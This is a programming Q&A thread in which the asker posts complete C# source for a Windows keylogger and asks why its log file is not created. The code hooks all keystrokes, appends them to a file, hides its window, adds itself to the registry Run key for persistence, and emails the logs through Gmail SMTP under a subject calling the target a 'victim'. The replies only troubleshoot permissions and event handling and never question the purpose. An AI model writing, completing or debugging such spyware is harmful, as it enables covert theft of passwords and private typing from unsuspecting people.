# C# code executes but doesn't create file in the chosen path

Tags: c#

i compiled and executed this C# code, but there is a problem. It should create a file named "Results.txt" in the path that i chose, but it doesn't. Is there something wrong? I need this to verify that the key inputs work. Thanks in advance.

```
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
using System.Net.Mail;
using Microsoft.Win32;



namespace KeyLogger
{


class globalKeyboardHook
{
    #region Constant, Structure and Delegate Definitions
    public delegate int keyboardHookProc(int code, int wParam, ref keyboardHookStruct lParam);

    public struct keyboardHookStruct
    {
        public int vkCode;
        public int scanCode;
        public int flags;
        public int time;
        public int dwExtraInfo;
    }

    const int WH_KEYBOARD_LL = 13;
    const int WM_KEYDOWN = 0x100;
    const int WM_KEYUP = 0x101;
    const int WM_SYSKEYDOWN = 0x104;
    const int WM_SYSKEYUP = 0x105;
    private keyboardHookProc hookProcDelegate;
    #endregion

    #region Instance Variables
    public List<Keys> HookedKeys = new List<Keys>();
    IntPtr hhook = IntPtr.Zero;
    #endregion

    #region Events
    public event KeyEventHandler KeyDown;
    public event KeyEventHandler KeyUp;
    #endregion

    #region Constructors and Destructors
    public globalKeyboardHook()
    {
        hookProcDelegate = hookProc;
        hook();
    }

    ~globalKeyboardHook()
    {
        unhook();
    }
    #endregion

    #region Public Methods
    public void hook()
    {
        IntPtr hInstance = LoadLibrary("User32");
        hhook = SetWindowsHookEx(WH_KEYBOARD_LL, hookProcDelegate, hInstance, 0);
    }

    public void unhook()
    {
        UnhookWindowsHookEx(hhook);
    }

    public int hookProc(int code, int wParam, ref keyboardHookStruct lParam)
    {
        if (code >= 0)
        {
            Keys key = (Keys)lParam.vkCode;
            if (HookedKeys.Contains(key))
            {
                KeyEventArgs kea = new KeyEventArgs(key);
                if ((wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN) && (KeyDown != null))
                {
                    KeyDown(this, kea);
                }
                else if ((wParam == WM_KEYUP || wParam == WM_SYSKEYUP) && (KeyUp != null))
                {
                    KeyUp(this, kea);
                }
                if (kea.Handled)
                    return 1;
            }
        }
        return CallNextHookEx(hhook, code, wParam, ref lParam);
    }
    #endregion

    #region DLL imports
    [DllImport("user32.dll")]
    static extern IntPtr SetWindowsHookEx(int idHook, keyboardHookProc callback, IntPtr hInstance, uint threadId);

    [DllImport("user32.dll")]
    static extern bool UnhookWindowsHookEx(IntPtr hInstance);

    [DllImport("user32.dll")]
    static extern int CallNextHookEx(IntPtr idHook, int nCode, int wParam, ref keyboardHookStruct lParam);

    [DllImport("kernel32.dll")]
    static extern IntPtr LoadLibrary(string lpFileName);
    #endregion
}


public partial class Form1 : Form
{
    public Form1()
    {
        InitializeComponent();
        this.Opacity = 0;
        this.ShowInTaskbar = true;
        email_send();
    }

    private void Form1_Load(object sender, EventArgs e)
    {
        RegistryKey rkApp = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
        IsStartupItem();
        if (!IsStartupItem()) { rkApp.SetValue("Nome Applicazione", Application.ExecutablePath.ToString()); }

        globalKeyboardHook gkh = new globalKeyboardHook();
        gkh.HookedKeys.Add(Keys.A);
        gkh.HookedKeys.Add(Keys.B);
        gkh.HookedKeys.Add(Keys.C);
        gkh.HookedKeys.Add(Keys.D);
        gkh.HookedKeys.Add(Keys.E);
        gkh.HookedKeys.Add(Keys.F);
        gkh.HookedKeys.Add(Keys.G);
        gkh.HookedKeys.Add(Keys.H);
        gkh.HookedKeys.Add(Keys.I);
        gkh.HookedKeys.Add(Keys.J);
        gkh.HookedKeys.Add(Keys.K);
        gkh.HookedKeys.Add(Keys.L);
        gkh.HookedKeys.Add(Keys.M);
        gkh.HookedKeys.Add(Keys.N);
        gkh.HookedKeys.Add(Keys.O);
        gkh.HookedKeys.Add(Keys.P);
        gkh.HookedKeys.Add(Keys.Q);
        gkh.HookedKeys.Add(Keys.R);
        gkh.HookedKeys.Add(Keys.S);
        gkh.HookedKeys.Add(Keys.T);
        gkh.HookedKeys.Add(Keys.U);
        gkh.HookedKeys.Add(Keys.V);
        gkh.HookedKeys.Add(Keys.W);
        gkh.HookedKeys.Add(Keys.X);
        gkh.HookedKeys.Add(Keys.Y);
        gkh.HookedKeys.Add(Keys.Z);
        gkh.HookedKeys.Add(Keys.Back);
        gkh.HookedKeys.Add(Keys.Capital);
        gkh.HookedKeys.Add(Keys.CapsLock);
        gkh.HookedKeys.Add(Keys.Enter);
        gkh.HookedKeys.Add(Keys.Space);
        gkh.HookedKeys.Add(Keys.NumPad0);
        gkh.HookedKeys.Add(Keys.NumPad1);
        gkh.HookedKeys.Add(Keys.NumPad2);
        gkh.HookedKeys.Add(Keys.NumPad3);
        gkh.HookedKeys.Add(Keys.NumPad4);
        gkh.HookedKeys.Add(Keys.NumPad5);
        gkh.HookedKeys.Add(Keys.NumPad6);
        gkh.HookedKeys.Add(Keys.NumPad7);
        gkh.HookedKeys.Add(Keys.NumPad8);
        gkh.HookedKeys.Add(Keys.NumPad9);
        gkh.HookedKeys.Add(Keys.D0);
        gkh.HookedKeys.Add(Keys.D1);
        gkh.HookedKeys.Add(Keys.D2);
        gkh.HookedKeys.Add(Keys.D3);
        gkh.HookedKeys.Add(Keys.D4);
        gkh.HookedKeys.Add(Keys.D5);
        gkh.HookedKeys.Add(Keys.D6);
        gkh.HookedKeys.Add(Keys.D7);
        gkh.HookedKeys.Add(Keys.D8);
        gkh.HookedKeys.Add(Keys.D9);
        gkh.HookedKeys.Add(Keys.Delete);
        gkh.HookedKeys.Add(Keys.Oemcomma);
        gkh.HookedKeys.Add(Keys.Oem1);
        gkh.HookedKeys.Add(Keys.Oem102);
        gkh.HookedKeys.Add(Keys.Oem2);
        gkh.HookedKeys.Add(Keys.Oem3);
        gkh.HookedKeys.Add(Keys.Oem4);
        gkh.HookedKeys.Add(Keys.Oem5);
        gkh.HookedKeys.Add(Keys.Oem6);
        gkh.HookedKeys.Add(Keys.Oem7);
        gkh.HookedKeys.Add(Keys.Oem8);
        gkh.HookedKeys.Add(Keys.OemBackslash);
        gkh.HookedKeys.Add(Keys.OemClear);
        gkh.HookedKeys.Add(Keys.OemCloseBrackets);
        gkh.HookedKeys.Add(Keys.OemMinus);
        gkh.HookedKeys.Add(Keys.OemOpenBrackets);
        gkh.HookedKeys.Add(Keys.OemPeriod);
        gkh.HookedKeys.Add(Keys.OemPipe);
        gkh.HookedKeys.Add(Keys.Oemplus);
        gkh.HookedKeys.Add(Keys.OemQuestion);
        gkh.HookedKeys.Add(Keys.OemQuotes);
        gkh.HookedKeys.Add(Keys.OemSemicolon);
        gkh.HookedKeys.Add(Keys.Oemtilde);
        gkh.HookedKeys.Add(Keys.RShiftKey);
        gkh.HookedKeys.Add(Keys.LShiftKey);
        gkh.KeyDown += new KeyEventHandler(gkh_KeyDown);
    }

    void gkh_KeyDown(object sender, KeyEventArgs e)
    {
        string path = @"C:\Windows\Results.txt";

        string content = e.KeyCode.ToString();
        if (content == "Return") { content = " <ENTER> "; }
        else if (content == "Back") { content = " <BACK> "; }
        else if (content == "Capital") { content = " <CAPS_LOCKS> "; }
        else if (content == "Delete") { content = " <DELETE> "; }
        else if (content == "Space") { content = " "; }
        else if (content == "D1") { content = "1"; }
        else if (content == "NumPad1") { content = "1"; }
        else if (content == "D2") { content = "2"; }
        else if (content == "NumPad2") { content = "2"; }
        else if (content == "D3") { content = "3"; }
        else if (content == "NumPad3") { content = "3"; }
        else if (content == "D4") { content = "4"; }
        else if (content == "NumPad4") { content = "4"; }
        else if (content == "D5") { content = "5"; }
        else if (content == "NumPad5") { content = "5"; }
        else if (content == "D6") { content = "6"; }
        else if (content == "NumPad6") { content = "6"; }
        else if (content == "D7") { content = "7"; }
        else if (content == "NumPad7") { content = "7"; }
        else if (content == "D8") { content = "8"; }
        else if (content == "NumPad8") { content = "8"; }
        else if (content == "D9") { content = "9"; }
        else if (content == "NumPad9") { content = "9"; }
        else if (content == "D0") { content = "0"; }
        else if (content == "NumPad0") { content = "0"; }
        else if (content == "Oemcomma") { content = ","; }
        else if (content == "Oem1") { content = "è"; }
        else if (content == "Oemtilde") { content = "ò"; }
        else if (content == "Oem7") { content = "à"; }
        else if (content == "OemQuestion") { content = "ù"; }
        else if (content == "Oem5") { content = "\\"; }
        else if (content == "OemBackSlash") { content = "<"; }
        else if (content == "Oem6") { content = "ì"; }
        else if (content == "OemOpenBrackets") { content = "'"; }
        else if (content == "Oemplus") { content = "+"; }
        else if (content == "OemPeriod") { content = "."; }
        else if (content == "OemMinus") { content = "-"; }
        else if (content == "LShiftKey") { content = " <Shift_SX> "; }
        else if (content == "RShiftKey") { content = " <Shift_DX> "; }
        File.AppendAllText(path, content);
    }

    private bool IsStartupItem()
    {
        RegistryKey rkApp = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
        if (rkApp.GetValue("Nome Applicazione") == null)
            return false;
        else
            return true;
    }

    public void email_send()
    {
        try
        {
            MailMessage mail = new MailMessage();
            SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com");
            SmtpServer.EnableSsl = true;
            mail.From = new MailAddress("Email_sender@gmail.com");
            mail.To.Add("Email_receiver@gmail.com");
            mail.Subject = "Nuovi logs per questa vittima";
            mail.Body = "Logs in file di testo allegato";
            System.Net.Mail.Attachment attachment;
            attachment = new System.Net.Mail.Attachment(@"C:\Windows\Desktop");
            mail.Attachments.Add(attachment);

            SmtpServer.Port = 587;
            SmtpServer.Credentials = new System.Net.NetworkCredential("Email_sender@gmail.com", "Password");
            SmtpServer.EnableSsl = true;

            SmtpServer.Send(mail);

            attachment.Dispose();
            SmtpServer.Dispose();
        }
        catch (Exception ex) { }
    }
}
}
```

Comment: You need to create the file in This path string path = @"C:\Windows\Results.txt"; if yes you need permission to this path.

Answer (score 0):

You might need permission to write to `C:\Windows`. Do you give you application admin privileges?
You can try changing the path to `C:\Users\<your username>`

Comment: I changed the path and executed the application as admin, but it's still not working

Comment: One of the action would have been enough (your user's folder doesn't require admin privileges).

Are you sure the event (keydown) is triggered? Try debugging with a breakpoint or add a print to the console to see if the function is called at all

Comment: It's strange. The source code i took worked for different people and they didn't do any change.

Comment: If I had to guess, those people (for whom the code is working as is) are likely running with UAC disabled.

Comment: I disabled the UAC and nothing changed. I noticed that if i create the file and try to delete it while the application is running it says that it's in use. So it doesn't create the file because the keyboard event doesn't work. How could it be?